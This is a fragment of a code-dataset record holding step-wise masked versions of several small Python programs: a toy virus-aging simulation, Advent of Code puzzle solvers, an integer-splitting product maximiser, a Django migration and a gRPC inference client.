"step-4": "class Virus:\n\n def __init__(self, _name, _age, _malignancy):\n self.name = _name\n self.age = _age\n self.malignancy = _malignancy\n\n def set_name(self, _name):\n self.name = _name\n\n def set_age(self, _age):\n self.age = _age\n\n def set_malignancy(self, _malignancy):\n self.malignancy = _malignancy\n\n def update(self):\n self.age += 1\n if self.age % 3 == 0:\n self.malignancy += 1\n if self.malignancy < 0:\n self.malignancy = 0\n if self.malignancy > 99:\n self.malignancy = 99\n\n def __str__(self):\n return 'Nama: {}; Usia: {}; Tingkat Keganasan: {}'.format(self.name,\n str(self.age), str(self.malignancy))\n\n\nif __name__ == '__main__':\n tmp = input().split()\n number_of_virus = int(tmp[0])\n number_of_day = int(tmp[1])\n viruses = []\n for index_of_virus in range(0, number_of_virus):\n tmp = input().split()\n virus_name = tmp[0]\n virus_age = int(tmp[1])\n virus_malignancy = int(tmp[2])\n tmp_virus = Virus(virus_name, virus_age, virus_malignancy)\n viruses.append(tmp_virus)\n for day in range(1, number_of_day + 1):\n print('Hari #{}'.format(str(day)))\n for index_of_virus in range(0, len(viruses)):\n viruses[index_of_virus].update()\n print(viruses[index_of_virus])\n",
"step-5": "\nclass Virus:\n def __init__(self, _name, _age, _malignancy):\n self.name = _name\n self.age = _age\n self.malignancy = _malignancy\n\n def set_name(self, _name):\n self.name = _name\n \n def set_age(self, _age):\n self.age = _age\n\n def set_malignancy(self, _malignancy):\n self.malignancy = _malignancy\n\n def update(self):\n self.age += 1\n\n if self.age % 3 == 0:\n self.malignancy += 1\n\n if self.malignancy < 0:\n self.malignancy = 0\n\n if self.malignancy > 99:\n self.malignancy = 99\n \n def __str__(self):\n return \"Nama: {}; Usia: {}; Tingkat Keganasan: {}\".format(self.name, str(self.age), str(self.malignancy))\n\nif __name__ == \"__main__\":\n tmp = input().split()\n number_of_virus = int(tmp[0])\n number_of_day = int(tmp[1])\n\n viruses = []\n for index_of_virus in range(0, number_of_virus):\n tmp = input().split()\n virus_name = tmp[0]\n virus_age = int(tmp[1])\n virus_malignancy = int(tmp[2])\n\n tmp_virus = Virus(virus_name, virus_age, virus_malignancy)\n\n viruses.append(tmp_virus)\n\n for day in range(1, number_of_day + 1):\n print(\"Hari #{}\".format(str(day)))\n\n for index_of_virus in range(0, len(viruses)):\n viruses[index_of_virus].update()\n \n print(viruses[index_of_virus])\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
def part_1() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number(str(number)):
total += 1
return total
<|reserved_special_token_0|>
def check_number_2(problem_input: str) ->bool:
previous = 0
current = 1
triple = True
seen_a_double = False
length = len(problem_input)
while current < length:
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[current]) == int(problem_input[previous]):
if previous >= 1:
triple = int(problem_input[previous - 1]) == int(problem_input
[previous])
if current < length - 1:
triple = int(problem_input[current + 1]) == int(problem_input
[current])
while current < length - 1 and int(problem_input[current]
) == int(problem_input[current + 1]):
current += 1
previous += 1
if not triple:
seen_a_double = True
previous += 1
current += 1
return seen_a_double
<|reserved_special_token_0|>
def main():
x = '111111'
print(check_number(x) is True)
x = '223450'
print(check_number(x) is False)
x = '123789'
print(check_number(x) is False)
print('PART 1:', part_1())
x = '112233'
print(check_number_2(x) is True)
x = '123444'
print(check_number_2(x) is False)
x = '111122'
print(check_number_2(x) is True)
x = '112222'
print(check_number_2(x) is True)
x = '1112589'
print(check_number_2(x) is False)
print('PART 2:', part_2())
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def part_1() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number(str(number)):
total += 1
return total
<|reserved_special_token_0|>
def check_number_2(problem_input: str) ->bool:
previous = 0
current = 1
triple = True
seen_a_double = False
length = len(problem_input)
while current < length:
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[current]) == int(problem_input[previous]):
if previous >= 1:
triple = int(problem_input[previous - 1]) == int(problem_input
[previous])
if current < length - 1:
triple = int(problem_input[current + 1]) == int(problem_input
[current])
while current < length - 1 and int(problem_input[current]
) == int(problem_input[current + 1]):
current += 1
previous += 1
if not triple:
seen_a_double = True
previous += 1
current += 1
return seen_a_double
def part_2() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number_2(str(number)):
total += 1
return total
def main():
x = '111111'
print(check_number(x) is True)
x = '223450'
print(check_number(x) is False)
x = '123789'
print(check_number(x) is False)
print('PART 1:', part_1())
x = '112233'
print(check_number_2(x) is True)
x = '123444'
print(check_number_2(x) is False)
x = '111122'
print(check_number_2(x) is True)
x = '112222'
print(check_number_2(x) is True)
x = '1112589'
print(check_number_2(x) is False)
print('PART 2:', part_2())
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def part_1() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number(str(number)):
total += 1
return total
def check_number(problem_input: str) ->bool:
previous = 0
double = False
for current in range(1, len(problem_input)):
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[previous]) == int(problem_input[current]):
double = True
previous += 1
return double
def check_number_2(problem_input: str) ->bool:
previous = 0
current = 1
triple = True
seen_a_double = False
length = len(problem_input)
while current < length:
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[current]) == int(problem_input[previous]):
if previous >= 1:
triple = int(problem_input[previous - 1]) == int(problem_input
[previous])
if current < length - 1:
triple = int(problem_input[current + 1]) == int(problem_input
[current])
while current < length - 1 and int(problem_input[current]
) == int(problem_input[current + 1]):
current += 1
previous += 1
if not triple:
seen_a_double = True
previous += 1
current += 1
return seen_a_double
def part_2() ->int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number_2(str(number)):
total += 1
return total
def main():
x = '111111'
print(check_number(x) is True)
x = '223450'
print(check_number(x) is False)
x = '123789'
print(check_number(x) is False)
print('PART 1:', part_1())
x = '112233'
print(check_number_2(x) is True)
x = '123444'
print(check_number_2(x) is False)
x = '111122'
print(check_number_2(x) is True)
x = '112222'
print(check_number_2(x) is True)
x = '1112589'
print(check_number_2(x) is False)
print('PART 2:', part_2())
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def part_1() -> int:
    """Count candidates in the fixed puzzle range that pass check_number."""
    lo, hi = 382345, 843167
    return sum(1 for candidate in range(lo, hi + 1) if check_number(str(candidate)))
def check_number(problem_input: str) -> bool:
    """Part-1 rule: True iff the digits never decrease and at least one
    adjacent pair of digits is equal."""
    digits = [int(ch) for ch in problem_input]
    adjacent = list(zip(digits, digits[1:]))
    if any(right < left for left, right in adjacent):
        return False
    return any(left == right for left, right in adjacent)
def check_number_2(problem_input: str) -> bool:
    """Part-2 rule: True iff the digits never decrease and some maximal run
    of equal digits has length exactly two (a double that is not part of a
    larger group).

    Replaces the original two-pointer scan with an equivalent but much
    simpler monotonicity check plus a run-length test. Also fixes a latent
    edge case: for a 2-character input such as '11' the old code skipped
    both look-arounds and its initial ``triple = True`` suppressed the
    double, wrongly returning False (unreachable for 6-digit puzzle input).
    """
    from itertools import groupby  # local import keeps file-level imports untouched
    digits = [int(ch) for ch in problem_input]
    # Any decreasing adjacent pair disqualifies the number (same as part 1).
    if any(right < left for left, right in zip(digits, digits[1:])):
        return False
    # Accept only if some maximal run of equal digits has length exactly 2.
    return any(len(list(run)) == 2 for _, run in groupby(digits))
def part_2() -> int:
    """Count candidates in the fixed puzzle range that pass check_number_2."""
    lo, hi = 382345, 843167
    return sum(1 for candidate in range(lo, hi + 1) if check_number_2(str(candidate)))
def main():
    """Print ad-hoc self-checks (each line should read True) and both answers."""
    # check_number: non-decreasing digits with at least one adjacent double.
    x = '111111'
    print(check_number(x) is True)
    x = '223450'
    print(check_number(x) is False)
    x = '123789'
    print(check_number(x) is False)
    print('PART 1:', part_1())
    # check_number_2: additionally requires a run of exactly two equal digits.
    x = '112233'
    print(check_number_2(x) is True)
    x = '123444'
    print(check_number_2(x) is False)
    x = '111122'
    print(check_number_2(x) is True)
    x = '112222'
    print(check_number_2(x) is True)
    x = '1112589'
    print(check_number_2(x) is False)
    print('PART 2:', part_2())


if __name__ == '__main__':
    main()
<|reserved_special_token_1|>
def part_1() -> int:
start = 382345
end = 843167
total = 0
for number in range(start, end + 1):
if check_number(str(number)):
total += 1
return total
def check_number(problem_input: str) -> bool:
previous = 0
double = False
for current in range(1, len(problem_input)):
if int(problem_input[current]) < int(problem_input[previous]):
return False
if int(problem_input[previous]) == int(problem_input[current]):
double = True
previous += 1
return double
def check_number_2(problem_input: str) -> bool:
    """Return True when the digit string never decreases and at least one
    maximal run of equal digits has length exactly two (part-2 rule).

    Fixes the original two-pointer scanner, which mishandled a pair sitting
    at the end of a two-character input ('11' incorrectly returned False
    because the look-ahead branch never ran and ``triple`` kept its initial
    True). Behaviour is unchanged for the 6-digit puzzle inputs.
    """
    from itertools import groupby  # local import: keeps this block self-contained

    # Reject any decreasing adjacent pair; digit characters order like ints.
    if any(right < left for left, right in
           zip(problem_input, problem_input[1:])):
        return False
    # Accept iff some maximal run of equal digits is exactly a pair.
    return any(sum(1 for _ in run) == 2 for _, run in groupby(problem_input))
def part_2(start: int = 382345, end: int = 843167) -> int:
    """Count passwords in [start, end] that satisfy the part-2 rules.

    The bounds default to this puzzle's input range, so existing calls of
    ``part_2()`` behave exactly as before (mirrors ``part_1``'s signature
    for consistency).

    Returns:
        Number of integers in the inclusive range whose decimal digits pass
        ``check_number_2``.
    """
    total = 0
    for number in range(start, end + 1):
        if check_number_2(str(number)):
            total += 1
    return total
def main():
    """Smoke-test both validators against the puzzle's worked examples,
    then print the answers for both parts."""
    # Part-1 examples: each line should print True.
    x = "111111"
    print(check_number(x) is True)
    x = "223450"
    print(check_number(x) is False)
    x = "123789"
    print(check_number(x) is False)
    print("PART 1:", part_1())  # should be 460 for this puzzle input
    # Part-2 examples: each line should print True.
    x = "112233"
    print(check_number_2(x) is True)
    x = "123444"
    print(check_number_2(x) is False)
    x = "111122"
    print(check_number_2(x) is True)
    x = "112222"
    print(check_number_2(x) is True)
    x = "1112589"
    print(check_number_2(x) is False)
    print("PART 2:", part_2())
if __name__ == '__main__':
    main()
|
flexible
|
{
"blob_id": "c46495eebbe796253f56b7472d5548b41c5d0bc4",
"index": 2411,
"step-1": "def part_1() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number(str(number)):\n total += 1\n return total\n\n\n<mask token>\n\n\ndef check_number_2(problem_input: str) ->bool:\n previous = 0\n current = 1\n triple = True\n seen_a_double = False\n length = len(problem_input)\n while current < length:\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[current]) == int(problem_input[previous]):\n if previous >= 1:\n triple = int(problem_input[previous - 1]) == int(problem_input\n [previous])\n if current < length - 1:\n triple = int(problem_input[current + 1]) == int(problem_input\n [current])\n while current < length - 1 and int(problem_input[current]\n ) == int(problem_input[current + 1]):\n current += 1\n previous += 1\n if not triple:\n seen_a_double = True\n previous += 1\n current += 1\n return seen_a_double\n\n\n<mask token>\n\n\ndef main():\n x = '111111'\n print(check_number(x) is True)\n x = '223450'\n print(check_number(x) is False)\n x = '123789'\n print(check_number(x) is False)\n print('PART 1:', part_1())\n x = '112233'\n print(check_number_2(x) is True)\n x = '123444'\n print(check_number_2(x) is False)\n x = '111122'\n print(check_number_2(x) is True)\n x = '112222'\n print(check_number_2(x) is True)\n x = '1112589'\n print(check_number_2(x) is False)\n print('PART 2:', part_2())\n\n\n<mask token>\n",
"step-2": "def part_1() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number(str(number)):\n total += 1\n return total\n\n\n<mask token>\n\n\ndef check_number_2(problem_input: str) ->bool:\n previous = 0\n current = 1\n triple = True\n seen_a_double = False\n length = len(problem_input)\n while current < length:\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[current]) == int(problem_input[previous]):\n if previous >= 1:\n triple = int(problem_input[previous - 1]) == int(problem_input\n [previous])\n if current < length - 1:\n triple = int(problem_input[current + 1]) == int(problem_input\n [current])\n while current < length - 1 and int(problem_input[current]\n ) == int(problem_input[current + 1]):\n current += 1\n previous += 1\n if not triple:\n seen_a_double = True\n previous += 1\n current += 1\n return seen_a_double\n\n\ndef part_2() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number_2(str(number)):\n total += 1\n return total\n\n\ndef main():\n x = '111111'\n print(check_number(x) is True)\n x = '223450'\n print(check_number(x) is False)\n x = '123789'\n print(check_number(x) is False)\n print('PART 1:', part_1())\n x = '112233'\n print(check_number_2(x) is True)\n x = '123444'\n print(check_number_2(x) is False)\n x = '111122'\n print(check_number_2(x) is True)\n x = '112222'\n print(check_number_2(x) is True)\n x = '1112589'\n print(check_number_2(x) is False)\n print('PART 2:', part_2())\n\n\n<mask token>\n",
"step-3": "def part_1() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number(str(number)):\n total += 1\n return total\n\n\ndef check_number(problem_input: str) ->bool:\n previous = 0\n double = False\n for current in range(1, len(problem_input)):\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[previous]) == int(problem_input[current]):\n double = True\n previous += 1\n return double\n\n\ndef check_number_2(problem_input: str) ->bool:\n previous = 0\n current = 1\n triple = True\n seen_a_double = False\n length = len(problem_input)\n while current < length:\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[current]) == int(problem_input[previous]):\n if previous >= 1:\n triple = int(problem_input[previous - 1]) == int(problem_input\n [previous])\n if current < length - 1:\n triple = int(problem_input[current + 1]) == int(problem_input\n [current])\n while current < length - 1 and int(problem_input[current]\n ) == int(problem_input[current + 1]):\n current += 1\n previous += 1\n if not triple:\n seen_a_double = True\n previous += 1\n current += 1\n return seen_a_double\n\n\ndef part_2() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number_2(str(number)):\n total += 1\n return total\n\n\ndef main():\n x = '111111'\n print(check_number(x) is True)\n x = '223450'\n print(check_number(x) is False)\n x = '123789'\n print(check_number(x) is False)\n print('PART 1:', part_1())\n x = '112233'\n print(check_number_2(x) is True)\n x = '123444'\n print(check_number_2(x) is False)\n x = '111122'\n print(check_number_2(x) is True)\n x = '112222'\n print(check_number_2(x) is True)\n x = '1112589'\n print(check_number_2(x) is False)\n print('PART 2:', part_2())\n\n\n<mask token>\n",
"step-4": "def part_1() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number(str(number)):\n total += 1\n return total\n\n\ndef check_number(problem_input: str) ->bool:\n previous = 0\n double = False\n for current in range(1, len(problem_input)):\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[previous]) == int(problem_input[current]):\n double = True\n previous += 1\n return double\n\n\ndef check_number_2(problem_input: str) ->bool:\n previous = 0\n current = 1\n triple = True\n seen_a_double = False\n length = len(problem_input)\n while current < length:\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[current]) == int(problem_input[previous]):\n if previous >= 1:\n triple = int(problem_input[previous - 1]) == int(problem_input\n [previous])\n if current < length - 1:\n triple = int(problem_input[current + 1]) == int(problem_input\n [current])\n while current < length - 1 and int(problem_input[current]\n ) == int(problem_input[current + 1]):\n current += 1\n previous += 1\n if not triple:\n seen_a_double = True\n previous += 1\n current += 1\n return seen_a_double\n\n\ndef part_2() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number_2(str(number)):\n total += 1\n return total\n\n\ndef main():\n x = '111111'\n print(check_number(x) is True)\n x = '223450'\n print(check_number(x) is False)\n x = '123789'\n print(check_number(x) is False)\n print('PART 1:', part_1())\n x = '112233'\n print(check_number_2(x) is True)\n x = '123444'\n print(check_number_2(x) is False)\n x = '111122'\n print(check_number_2(x) is True)\n x = '112222'\n print(check_number_2(x) is True)\n x = '1112589'\n print(check_number_2(x) is False)\n print('PART 2:', part_2())\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "def part_1() -> int:\n start = 382345\n end = 843167\n total = 0\n\n for number in range(start, end + 1):\n if check_number(str(number)):\n total += 1\n\n return total\n\n\ndef check_number(problem_input: str) -> bool:\n previous = 0\n double = False\n for current in range(1, len(problem_input)):\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[previous]) == int(problem_input[current]):\n double = True\n previous += 1\n\n return double\n\n\ndef check_number_2(problem_input: str) -> bool:\n previous = 0\n current = 1\n triple = True\n seen_a_double = False\n length = len(problem_input)\n while current < length:\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[current]) == int(problem_input[previous]):\n if previous >= 1:\n triple = int(problem_input[previous - 1]) == int(problem_input[previous])\n if current < length - 1:\n triple = int(problem_input[current + 1]) == int(problem_input[current])\n while current < length - 1 and int(problem_input[current]) == int(problem_input[current + 1]):\n current += 1\n previous += 1\n if not triple:\n seen_a_double = True\n\n previous += 1\n current += 1\n\n return seen_a_double\n\n\ndef part_2() -> int:\n start = 382345\n end = 843167\n total = 0\n\n for number in range(start, end + 1):\n if check_number_2(str(number)):\n total += 1\n\n return total\n\n\ndef main():\n x = \"111111\"\n print(check_number(x) is True)\n x = \"223450\"\n print(check_number(x) is False)\n x = \"123789\"\n print(check_number(x) is False)\n\n print(\"PART 1:\", part_1()) # should be 460\n\n x = \"112233\"\n print(check_number_2(x) is True)\n x = \"123444\"\n print(check_number_2(x) is False)\n x = \"111122\"\n print(check_number_2(x) is True)\n x = \"112222\"\n print(check_number_2(x) is True)\n x = \"1112589\"\n print(check_number_2(x) is False)\n\n print(\"PART 2:\", part_2())\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from itertools import combinations

# Advent of Code 2020 day 1, part 2: find the three entries in input.txt
# that sum to 2020 and print their product.
#
# Fixes over the original: the file is closed via a context manager; the
# three indices are guaranteed distinct (the old ranges started at i and j,
# so the same entry could be reused); and the search stops at the first hit
# (the old `break` only exited the innermost loop, so every permutation of
# the answer was printed).
with open("input.txt", "r") as input_object:
    cleaned_data = [int(line.strip()) for line in input_object]

for a, b, c in combinations(cleaned_data, 3):
    if a + b + c == 2020:
        ans = a * b * c
        print(ans)
        break
|
normal
|
{
"blob_id": "72f3ae476581ff5acd6c7101764f4764285a47bd",
"index": 4426,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ninput_object.close()\n<mask token>\nfor line in input_data:\n cleaned_data.append(int(line.strip()))\n<mask token>\nfor i in range(0, input_size):\n for j in range(i, input_size):\n for k in range(j, input_size):\n if cleaned_data[i] + cleaned_data[j] + cleaned_data[k] == 2020:\n ans = cleaned_data[i] * cleaned_data[j] * cleaned_data[k]\n print(ans)\n break\n",
"step-3": "input_object = open('input.txt', 'r')\ninput_data = input_object.readlines()\ninput_object.close()\ncleaned_data = []\nfor line in input_data:\n cleaned_data.append(int(line.strip()))\ninput_size = len(cleaned_data)\nfor i in range(0, input_size):\n for j in range(i, input_size):\n for k in range(j, input_size):\n if cleaned_data[i] + cleaned_data[j] + cleaned_data[k] == 2020:\n ans = cleaned_data[i] * cleaned_data[j] * cleaned_data[k]\n print(ans)\n break\n",
"step-4": "input_object = open(\"input.txt\", \"r\")\ninput_data = input_object.readlines()\ninput_object.close()\ncleaned_data = []\n\nfor line in input_data:\n cleaned_data.append(int(line.strip()))\ninput_size = len(cleaned_data)\n\n\nfor i in range(0, input_size):\n for j in range(i, input_size):\n for k in range(j, input_size):\n if cleaned_data[i] + cleaned_data[j] + cleaned_data[k] == 2020:\n ans = cleaned_data[i]*cleaned_data[j]*cleaned_data[k]\n print(ans)\n break",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
Split an integer into several positive parts so that the product of the
parts is maximized (the classic integer-break / rope-cutting problem).
'''
# recursive
def solution1(n):
    """Recursive solution: the best product for n is n itself when n <= 4,
    otherwise the best split of n into two parts, each solved recursively."""
    if n <= 4:
        return n
    best = 0
    for cut in range(1, n // 2 + 1):
        best = max(best, solution1(cut) * solution1(n - cut))
    return best
# dp
def solution2(n):
    """Bottom-up DP for the same problem as solution1.

    best[i] is the maximum product obtainable from integer i when keeping i
    uncut is allowed (so best[i] == i for i <= 4).

    Fixes the original recurrence, which multiplied an optimal left part by
    a raw, never-re-split right part and therefore under-counted (it
    returned 8 instead of 9 for n == 6); it also raised NameError for
    n <= 2 and printed debug output every iteration.
    """
    if n <= 4:
        return n
    best = [0, 1, 2, 3, 4]  # index 0 unused; best[i] for i in 1..4
    for i in range(5, n + 1):
        best.append(max(best[cut] * best[i - cut]
                        for cut in range(1, i // 2 + 1)))
    return best[n]
if __name__ == '__main__':
    # Quick manual check: both implementations should print 18 for n == 8.
    result = solution1(8)
    print(result)
    result = solution2(8)
    print(result)
|
normal
|
{
"blob_id": "76db5955b29696ca03ab22ef14ac018e0618e9e3",
"index": 2729,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef solution2(n):\n result_list = [1, 2]\n for i in range(3, n + 1):\n max_mult = max(list(map(lambda x: result_list[x] * (i - x - 1),\n range(i - 1))))\n result_list.append(max_mult)\n print(result_list, i)\n return max_mult\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef solution1(n):\n if n <= 4:\n return n\n else:\n return max(map(lambda x: solution1(x) * solution1(n - x), range(1, \n n // 2 + 1)))\n\n\ndef solution2(n):\n result_list = [1, 2]\n for i in range(3, n + 1):\n max_mult = max(list(map(lambda x: result_list[x] * (i - x - 1),\n range(i - 1))))\n result_list.append(max_mult)\n print(result_list, i)\n return max_mult\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef solution1(n):\n if n <= 4:\n return n\n else:\n return max(map(lambda x: solution1(x) * solution1(n - x), range(1, \n n // 2 + 1)))\n\n\ndef solution2(n):\n result_list = [1, 2]\n for i in range(3, n + 1):\n max_mult = max(list(map(lambda x: result_list[x] * (i - x - 1),\n range(i - 1))))\n result_list.append(max_mult)\n print(result_list, i)\n return max_mult\n\n\nif __name__ == '__main__':\n result = solution1(8)\n print(result)\n result = solution2(8)\n print(result)\n",
"step-5": "'''\nSeperate a number into several, maximize their product\n'''\n\n# recursive\ndef solution1(n):\n if n <= 4:\n return n\n else:\n return max(map(lambda x: solution1(x)*solution1(n-x), range(1, n//2 + 1)))\n\n# dp\ndef solution2(n):\n result_list = [1,2]\n\n for i in range(3, n+1):\n max_mult = max(list(map(lambda x: result_list[x] * (i-x-1), range(i-1))))\n result_list.append(max_mult)\n print(result_list, i)\n\n return max_mult\n\nif __name__ == '__main__':\n result = solution1(8)\n print(result)\n result = solution2(8)\n print(result)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
    """Rename dg.sn to dg.id, add an EAN-13 code and an English commercial
    designation, and move the model onto the dg_gen database table."""

    dependencies = [
        ('myems', '0004_auto_20201118_1446'),
    ]

    operations = [
        migrations.RenameField(
            model_name='dg',
            old_name='sn',
            new_name='id',
        ),
        migrations.AddField(
            model_name='dg',
            name='code_ean13',
            field=models.CharField(default=0, max_length=50),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='dg',
            name='commercial_designation_in_english',
            field=models.CharField(default=0, max_length=100),
            preserve_default=False,
        ),
        migrations.AlterModelTable(
            name='dg',
            table='dg_gen',
        ),
    ]
<|reserved_special_token_1|>
from django.db import migrations, models
class Migration(migrations.Migration):
    # Applies on top of migration 0004 in the 'myems' app.
    dependencies = [('myems', '0004_auto_20201118_1446')]
    # Rename dg.sn -> dg.id, add an EAN-13 code field and an English
    # commercial-designation field (one-off default 0, not kept), then
    # point the model at the dg_gen database table.
    operations = [migrations.RenameField(model_name='dg', old_name='sn',
        new_name='id'), migrations.AddField(model_name='dg', name=
        'code_ean13', field=models.CharField(default=0, max_length=50),
        preserve_default=False), migrations.AddField(model_name='dg', name=
        'commercial_designation_in_english', field=models.CharField(default
        =0, max_length=100), preserve_default=False), migrations.
        AlterModelTable(name='dg', table='dg_gen')]
<|reserved_special_token_1|>
# Generated by Django 3.1.3 on 2020-11-19 06:19
from django.db import migrations, models
class Migration(migrations.Migration):
    """Rename dg.sn to dg.id, add two character fields, and move the model
    onto the dg_gen database table."""

    # Applies on top of migration 0004 in the 'myems' app.
    dependencies = [
        ('myems', '0004_auto_20201118_1446'),
    ]

    operations = [
        migrations.RenameField(
            model_name='dg',
            old_name='sn',
            new_name='id',
        ),
        # One-off default 0 satisfies existing rows; not kept on the field.
        migrations.AddField(
            model_name='dg',
            name='code_ean13',
            field=models.CharField(default=0, max_length=50),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='dg',
            name='commercial_designation_in_english',
            field=models.CharField(default=0, max_length=100),
            preserve_default=False,
        ),
        migrations.AlterModelTable(
            name='dg',
            table='dg_gen',
        ),
    ]
|
flexible
|
{
"blob_id": "11d96a8a400afb0861b92d8900e003826614c99a",
"index": 7502,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('myems', '0004_auto_20201118_1446')]\n operations = [migrations.RenameField(model_name='dg', old_name='sn',\n new_name='id'), migrations.AddField(model_name='dg', name=\n 'code_ean13', field=models.CharField(default=0, max_length=50),\n preserve_default=False), migrations.AddField(model_name='dg', name=\n 'commercial_designation_in_english', field=models.CharField(default\n =0, max_length=100), preserve_default=False), migrations.\n AlterModelTable(name='dg', table='dg_gen')]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('myems', '0004_auto_20201118_1446')]\n operations = [migrations.RenameField(model_name='dg', old_name='sn',\n new_name='id'), migrations.AddField(model_name='dg', name=\n 'code_ean13', field=models.CharField(default=0, max_length=50),\n preserve_default=False), migrations.AddField(model_name='dg', name=\n 'commercial_designation_in_english', field=models.CharField(default\n =0, max_length=100), preserve_default=False), migrations.\n AlterModelTable(name='dg', table='dg_gen')]\n",
"step-5": "# Generated by Django 3.1.3 on 2020-11-19 06:19\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('myems', '0004_auto_20201118_1446'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='dg',\n old_name='sn',\n new_name='id',\n ),\n migrations.AddField(\n model_name='dg',\n name='code_ean13',\n field=models.CharField(default=0, max_length=50),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='dg',\n name='commercial_designation_in_english',\n field=models.CharField(default=0, max_length=100),\n preserve_default=False,\n ),\n migrations.AlterModelTable(\n name='dg',\n table='dg_gen',\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import grpc
import time
import json
import sys
import uuid
from arch.api.proto import inference_service_pb2
from arch.api.proto import inference_service_pb2_grpc
import threading
def run(address):
    """Open an insecure gRPC channel to *address* and fire one inference
    request per worker thread, blocking until every worker finishes.

    Args:
        address: host:port string of the inference service.
    """
    workers = []
    with grpc.insecure_channel(address) as channel:
        for _ in range(1):  # bump this count to load-test with more senders
            workers.append(threading.Thread(target=send, args=(channel,)))
        # The original captured start/end timestamps here but never used
        # them; that dead timing code has been removed.
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()
def process_response(call_future):
    """Async-call callback: block on the finished future, print its payload."""
    response = call_future.result()
    print(response)
def send(channel):
    """Send one inference request with dummy feature data over *channel*
    and print both the outgoing JSON body and the service's reply."""
    stub = inference_service_pb2_grpc.InferenceServiceStub(channel)
    request = inference_service_pb2.InferenceMessage()
    features = {'fid1': 5.1, 'fid2': 6.2, 'fid3': 7.6}
    request_data = {
        'serviceId': 'xxxxxxxxx',
        'applyId': '',
        # 'modelId': 'arbiter-10000#guest-10000#host-10000#model'  # optionally pin the model id
        # 'modelVersion': 'acd3e1807a1211e9969aacde48001122'  # optionally pin the model version
        'caseid': uuid.uuid1().hex,
        'featureData': features,
        'sendToRemoteFeatureData': features,
    }
    print(json.dumps(request_data, indent=4))
    request.body = json.dumps(request_data).encode(encoding='utf-8')
    print(stub.inference(request))
if __name__ == '__main__':
    # Usage: python <script> <host:port>
    run(sys.argv[1])
|
normal
|
{
"blob_id": "5430e1861a6244c25c00699323efa0921a5af940",
"index": 3709,
"step-1": "<mask token>\n\n\ndef run(address):\n ths = []\n with grpc.insecure_channel(address) as channel:\n for i in range(1):\n th = threading.Thread(target=send, args=(channel,))\n ths.append(th)\n st = int(time.time())\n for th in ths:\n th.start()\n for th in ths:\n th.join()\n et = int(time.time())\n\n\n<mask token>\n\n\ndef send(channel):\n stub = inference_service_pb2_grpc.InferenceServiceStub(channel)\n request = inference_service_pb2.InferenceMessage()\n request_data = dict()\n request_data['serviceId'] = 'xxxxxxxxx'\n request_data['applyId'] = ''\n request_data['caseid'] = uuid.uuid1().hex\n feature_data = dict()\n feature_data['fid1'] = 5.1\n feature_data['fid2'] = 6.2\n feature_data['fid3'] = 7.6\n request_data['featureData'] = feature_data\n request_data['sendToRemoteFeatureData'] = feature_data\n print(json.dumps(request_data, indent=4))\n request.body = json.dumps(request_data).encode(encoding='utf-8')\n print(stub.inference(request))\n\n\n<mask token>\n",
